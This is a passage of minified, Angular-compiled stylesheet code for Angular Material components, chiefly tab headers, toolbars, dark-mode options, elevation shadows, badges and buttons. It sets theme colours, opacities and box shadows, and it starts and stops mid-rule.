.mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#fff;opacity:.12}.mat-tab-group.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#e1bee74d}.mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]{background-color:#7b1fa2}.mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label[_ngcontent-%COMP%], .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link[_ngcontent-%COMP%]{color:#fff}.mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%]{color:#fff6}.mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before{border-color:#fff}.mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%]{border-color:#fff;opacity:.4}.mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#fff;opacity:.12}.mat-tab-group.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#ffcdd24d}.mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]{background-color:#f44336}.mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label[_ngcontent-%COMP%], .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link[_ngcontent-%COMP%]{color:#fff}.mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%]{color:#fff6}.mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before{border-color:#fff}.mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%]{border-color:#fff;opacity:.4}.mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#fff;opacity:.12}.mat-toolbar[_ngcontent-%COMP%]{background:whitesmoke;color:#000000de}.mat-toolbar.mat-primary[_ngcontent-%COMP%]{background:#2196f3;color:#fff}.mat-toolbar.mat-accent[_ngcontent-%COMP%]{background:#7b1fa2;color:#fff}.mat-toolbar.mat-warn[_ngcontent-%COMP%]{background:#f44336;color:#fff}.mat-toolbar[_ngcontent-%COMP%]   .mat-form-field-underline[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%]   .mat-form-field-ripple[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%]   .mat-focused[_ngcontent-%COMP%]   .mat-form-field-ripple[_ngcontent-%COMP%]{background-color:currentColor}.mat-toolbar[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%]   .mat-focused[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%]   .mat-select-value[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%]   .mat-select-arrow[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%]   .mat-form-field.mat-focused[_ngcontent-%COMP%]   .mat-select-arrow[_ngcontent-%COMP%]{color:inherit}.mat-toolbar[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%]{caret-color:currentColor}.mat-toolbar-multiple-rows[_ngcontent-%COMP%]{min-height:64px}.mat-toolbar-row[_ngcontent-%COMP%], .mat-toolbar-single-row[_ngcontent-%COMP%]{height:64px}@media (max-width: 599px){.mat-toolbar-multiple-rows[_ngcontent-%COMP%]{min-height:56px}.mat-toolbar-row[_ngcontent-%COMP%], .mat-toolbar-single-row[_ngcontent-%COMP%]{height:56px}}.mat-tooltip[_ngcontent-%COMP%]{background:rgba(97,97,97,.9)}.mat-tree[_ngcontent-%COMP%]{background:white}.mat-tree-node[_ngcontent-%COMP%], .mat-nested-tree-node[_ngcontent-%COMP%]{color:#000000de}.mat-tree-node[_ngcontent-%COMP%]{min-height:48px}.mat-snack-bar-container[_ngcontent-%COMP%]{color:#ffffffb3;background:#323232;box-shadow:0 3px 5px -1px #0003,0 6px 10px #00000024,0 1px 18px #0000001f}.mat-simple-snackbar-action[_ngcontent-%COMP%]{color:#7b1fa2}.color-primary[_ngcontent-%COMP%]{color:#2196f3}.background-color-primary[_ngcontent-%COMP%]{background-color:#2196f3}.background-color-accent[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#ffffff1a}.darkMode[_ngcontent-%COMP%]   .mat-option[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-option[_ngcontent-%COMP%]:hover:not(.mat-option-disabled), .darkMode[_ngcontent-%COMP%]   .mat-option[_ngcontent-%COMP%]:focus:not(.mat-option-disabled){background:rgba(255,255,255,.04)}.darkMode[_ngcontent-%COMP%]   .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-option-multiple):not(.mat-option-disabled){background:rgba(255,255,255,.04)}.darkMode[_ngcontent-%COMP%]   .mat-option.mat-active[_ngcontent-%COMP%]{background:rgba(255,255,255,.04);color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-option.mat-option-disabled[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-primary[_ngcontent-%COMP%]   .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-option-disabled){color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-accent[_ngcontent-%COMP%]   .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-option-disabled){color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-warn[_ngcontent-%COMP%]   .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-option-disabled){color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-optgroup-label[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-optgroup-disabled[_ngcontent-%COMP%]   .mat-optgroup-label[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-pseudo-checkbox[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-pseudo-checkbox[_ngcontent-%COMP%]:after{color:#303030}.darkMode[_ngcontent-%COMP%]   .mat-pseudo-checkbox-disabled[_ngcontent-%COMP%]{color:#686868}.darkMode[_ngcontent-%COMP%]   .mat-primary[_ngcontent-%COMP%]   .mat-pseudo-checkbox-checked[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-primary[_ngcontent-%COMP%]   .mat-pseudo-checkbox-indeterminate[_ngcontent-%COMP%]{background:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-pseudo-checkbox-checked[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-pseudo-checkbox-indeterminate[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-accent[_ngcontent-%COMP%]   .mat-pseudo-checkbox-checked[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-accent[_ngcontent-%COMP%]   .mat-pseudo-checkbox-indeterminate[_ngcontent-%COMP%]{background:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-warn[_ngcontent-%COMP%]   .mat-pseudo-checkbox-checked[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-warn[_ngcontent-%COMP%]   .mat-pseudo-checkbox-indeterminate[_ngcontent-%COMP%]{background:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-pseudo-checkbox-checked.mat-pseudo-checkbox-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-pseudo-checkbox-indeterminate.mat-pseudo-checkbox-disabled[_ngcontent-%COMP%]{background:#686868}.darkMode[_ngcontent-%COMP%]   .mat-app-background[_ngcontent-%COMP%], .darkMode.mat-app-background[_ngcontent-%COMP%]{background-color:#303030;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z0[_ngcontent-%COMP%]{box-shadow:0 0 #0003,0 0 #00000024,0 0 #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z1[_ngcontent-%COMP%]{box-shadow:0 2px 1px -1px #0003,0 1px 1px #00000024,0 1px 3px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z2[_ngcontent-%COMP%]{box-shadow:0 3px 1px -2px #0003,0 2px 2px #00000024,0 1px 5px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z3[_ngcontent-%COMP%]{box-shadow:0 3px 3px -2px #0003,0 3px 4px #00000024,0 1px 8px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z4[_ngcontent-%COMP%]{box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z5[_ngcontent-%COMP%]{box-shadow:0 3px 5px -1px #0003,0 5px 8px #00000024,0 1px 14px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z6[_ngcontent-%COMP%]{box-shadow:0 3px 5px -1px #0003,0 6px 10px #00000024,0 1px 18px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z7[_ngcontent-%COMP%]{box-shadow:0 4px 5px -2px #0003,0 7px 10px 1px #00000024,0 2px 16px 1px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z8[_ngcontent-%COMP%]{box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z9[_ngcontent-%COMP%]{box-shadow:0 5px 6px -3px #0003,0 9px 12px 1px #00000024,0 3px 16px 2px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z10[_ngcontent-%COMP%]{box-shadow:0 6px 6px -3px #0003,0 10px 14px 1px #00000024,0 4px 18px 3px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z11[_ngcontent-%COMP%]{box-shadow:0 6px 7px -4px #0003,0 11px 15px 1px #00000024,0 4px 20px 3px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z12[_ngcontent-%COMP%]{box-shadow:0 7px 8px -4px #0003,0 12px 17px 2px #00000024,0 5px 22px 4px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z13[_ngcontent-%COMP%]{box-shadow:0 7px 8px -4px #0003,0 13px 19px 2px #00000024,0 5px 24px 4px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z14[_ngcontent-%COMP%]{box-shadow:0 7px 9px -4px #0003,0 14px 21px 2px #00000024,0 5px 26px 4px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z15[_ngcontent-%COMP%]{box-shadow:0 8px 9px -5px #0003,0 15px 22px 2px #00000024,0 6px 28px 5px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z16[_ngcontent-%COMP%]{box-shadow:0 8px 10px -5px #0003,0 16px 24px 2px #00000024,0 6px 30px 5px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z17[_ngcontent-%COMP%]{box-shadow:0 8px 11px -5px #0003,0 17px 26px 2px #00000024,0 6px 32px 5px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z18[_ngcontent-%COMP%]{box-shadow:0 9px 11px -5px #0003,0 18px 28px 2px #00000024,0 7px 34px 6px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z19[_ngcontent-%COMP%]{box-shadow:0 9px 12px -6px #0003,0 19px 29px 2px #00000024,0 7px 36px 6px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z20[_ngcontent-%COMP%]{box-shadow:0 10px 13px -6px #0003,0 20px 31px 3px #00000024,0 8px 38px 7px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z21[_ngcontent-%COMP%]{box-shadow:0 10px 13px -6px #0003,0 21px 33px 3px #00000024,0 8px 40px 7px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z22[_ngcontent-%COMP%]{box-shadow:0 10px 14px -6px #0003,0 22px 35px 3px #00000024,0 8px 42px 7px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z23[_ngcontent-%COMP%]{box-shadow:0 11px 14px -7px #0003,0 23px 36px 3px #00000024,0 9px 44px 8px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z24[_ngcontent-%COMP%]{box-shadow:0 11px 15px -7px #0003,0 24px 38px 3px #00000024,0 9px 46px 8px #0000001f}.mat-theme-loaded-marker[_ngcontent-%COMP%]{display:none}.darkMode[_ngcontent-%COMP%]   .mat-autocomplete-panel[_ngcontent-%COMP%]{background:#424242;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-autocomplete-panel[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-autocomplete-panel[_ngcontent-%COMP%]   .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-active):not(:hover){background:#424242}.darkMode[_ngcontent-%COMP%]   .mat-autocomplete-panel[_ngcontent-%COMP%]   .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-active):not(:hover):not(.mat-option-disabled){color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{color:#fff;background:#2196f3}.cdk-high-contrast-active[_ngcontent-%COMP%]   .darkMode[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{outline:solid 1px;border-radius:0}.darkMode[_ngcontent-%COMP%]   .mat-badge-accent[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{background:#7b1fa2;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-badge-warn[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{color:#fff;background:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-badge-disabled[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{background:#6e6e6e;color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-bottom-sheet-container[_ngcontent-%COMP%]{box-shadow:0 8px 10px -5px #0003,0 16px 24px 2px #00000024,0 6px 30px 5px #0000001f;background:#424242;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-button[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-stroked-button[_ngcontent-%COMP%]{color:inherit;background:transparent}.darkMode[_ngcontent-%COMP%]   .mat-button.mat-primary[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button.mat-primary[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-stroked-button.mat-primary[_ngcontent-%COMP%]{color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-button.mat-accent[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button.mat-accent[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-stroked-button.mat-accent[_ngcontent-%COMP%]{color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-button.mat-warn[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button.mat-warn[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-stroked-button.mat-warn[_ngcontent-%COMP%]{color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-stroked-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-stroked-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-stroked-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-stroked-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%]{color:#ffffff4d}.darkMode[_ngcontent-%COMP%]   .mat-button.mat-primary[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button.mat-primary[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-stroked-button.mat-primary[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%]{background-color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-button.mat-accent[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button.mat-accent[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-stroked-button.mat-accent[_ngcontent-%COMP%]   